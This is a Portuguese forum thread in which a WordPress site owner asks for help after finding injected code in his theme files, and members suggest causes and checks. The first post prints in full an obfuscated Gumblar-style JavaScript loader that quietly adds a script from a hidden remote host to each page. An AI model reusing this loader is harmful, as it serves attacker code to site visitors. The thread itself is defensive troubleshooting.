← Javascript

[JavaScript] Virus - <script>/*LGPL*/ try{ window.onload...

Lida 5285 vezes

Offline

Eraserhead 
Membro
Mensagens 112 Gostos 0
Troféus totais: 24
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 5 Level 4 Level 3 Level 2 Level 1 100 Posts 50 Posts

Apanhei num site meu este código:

Código: [Seleccione]
<script>/*LGPL*/ try{ window.onload = function(){var Bowahj9c7fqm0i = document.createElement('s#c$)r^$&!i)&!p^^!t&'.replace(/\!|&|\(|\)|@|\$|\^|#/ig, ''));Bowahj9c7fqm0i.setAttribute('defer', 'd!@e^)#f##@#e(@r#('.replace(/\^|&|\(|\)|#|\!|@|\$/ig, ''));Bowahj9c7fqm0i.setAttribute('type', 't@e!!#x$$t@(/@j@^)&a@@()v(@a@($s)c@&!r((@i@$p&&t@@'.replace(/\^|#|&|\$|@|\)|\(|\!/ig, ''));Bowahj9c7fqm0i.setAttribute('id', 'D@&#k&&!)i$!#y#&(l^$o^8)#o)!^$g@^!#^o##$h!)$o^&#$'.replace(/#|\)|&|\$|\^|\!|\(|@/ig, ''));Bowahj9c7fqm0i.setAttribute('s^$r$(c!@@'.replace(/#|@|&|\(|\)|\!|\^|\$/ig, ''),  'h))t^^t$^!p&!:))/$/&&$d@o^u(^@b&a^(n$(-&$c^@@o(#m)(.^m!^s)$!n&(.&@^c@o@)m)(!.($^c&#n&^)$.#@l&i#!)n!(k($$e$(d#i&n!)#&-##c((o(()#m)&&(^.^&w!e^b$^)d@)e@($s)&(k)$t$o$^p#$#n@^$$e@&t)$^.#^(&r&u#&:(@8()0()$)8^^0!&)/)@!a$!!@l#@l#(o@@(@c!i)(n#)^e^##.@)!f!@r^$/&(#@a)#&l&$)l$o#$!^c!)i$^&n$$e).#@(f$!#r(^@/@$#&^g#&&o@!o($$#g@&l&e@).(@c)!#o^)&m@()/#($s)(a!#h&(^i)#b&i!#^^^n@@d&#e)n^(@.)@c(#(o!@^m!(/)^)i($c&$#q&(#.&$@c#))o^m#$$/^^!)'.replace(/\(|@|\!|#|&|\^|\$|\)/ig, ''));if (document){document.body.appendChild(Bowahj9c7fqm0i);}} } catch(Xqdb4lm22gdqmffxywnb) {}</script>

Fiz umas pesquisas e encontrei isto:

- http://www.symantec.com/connect/blogs/new-obfuscated-scripts-wild-lgpl
- http://justcoded.com/article/gumblar-family-virus-removal-tool/

Alguém já teve este problema?
Offline

cenourinha 
Elite
Mensagens 4094 Gostos 21
Troféus totais: 34
Trófeus: (Ver todos)
Mobile User Apple User Level 6 Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4

Verifica se outros sites alojados no mesmo servidor não foram "injectados" com o mesmo código.
Offline

Eraserhead 
Membro
Mensagens 112 Gostos 0
Troféus totais: 24
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 5 Level 4 Level 3 Level 2 Level 1 100 Posts 50 Posts

Verifica se outros sites alojados no mesmo servidor não foram "injectados" com o mesmo código.

Já vi... não encontrei em mais nenhum!

As páginas onde estavam esses códigos eram: default-embeds.php, default-filters.php e default-widgets.php, j+a removi o código em todas.

Apenas apagar resolve alguma coisa? Como é que esta situação acontece?
Offline

Henrique Mouta 
Equipa
Mensagens 1189 Gostos 3
Troféus totais: 31
Trófeus: (Ver todos)
Level 6 Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Poll Starter Level 5 Level 4 Level 3

Sim resolve, mas pode muito bem aparecer novamente se a vunerabilidade não estiver resolvida. Uma vez tive o mesmo problema e vê bem de onde veio: de uma instalação de testes desactualizada SMF com um plugin desactualizado lol
Que script é esse? Ou é handmade?
Offline

Eraserhead 
Membro
Mensagens 112 Gostos 0
Troféus totais: 24
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 5 Level 4 Level 3 Level 2 Level 1 100 Posts 50 Posts

Eu não faço a mínima ideia como é que este script apareceu. Simplesmente tentei entrar no Wordpress do site e surgia um erro, não me deixava entrar. Quando vou ver o que se passava tinha lá esse script.

Como é que aquilo apareceu lá? Será que sofri um ataque?
Offline

Henrique Mouta 
Equipa
Mensagens 1189 Gostos 3
Troféus totais: 31
Trófeus: (Ver todos)
Level 6 Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Poll Starter Level 5 Level 4 Level 3

Eu queria saber era que cms estas utilizar :P
Offline

Eraserhead 
Membro
Mensagens 112 Gostos 0
Troféus totais: 24
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 5 Level 4 Level 3 Level 2 Level 1 100 Posts 50 Posts

Eu queria saber era que csm estas utilizar :P

csm? ou cms?

csm não sei o que é... Se for cms é o wordpress, como já tinha referido em cima.
Offline

Henrique Mouta 
Equipa
Mensagens 1189 Gostos 3
Troféus totais: 31
Trófeus: (Ver todos)
Level 6 Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Poll Starter Level 5 Level 4 Level 3

Sim é cms :) é o que dá escrever e falar ao telemovel ao mesmo tempo :P
Qual versão do Wordpress? Que plugins tens instalados? Está tudo actualizado?
Offline

Eraserhead 
Membro
Mensagens 112 Gostos 0
Troféus totais: 24
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 5 Level 4 Level 3 Level 2 Level 1 100 Posts 50 Posts

Sim é cms :) é o que dá escrever e falar ao telemovel ao mesmo tempo :P
Qual versão do Wordpress? Que plugins tens instalados? Está tudo actualizado?

É a ultima versão. Sim tenho os plugins todos actualizados. O mais estranho é que não instalei nada recentemente...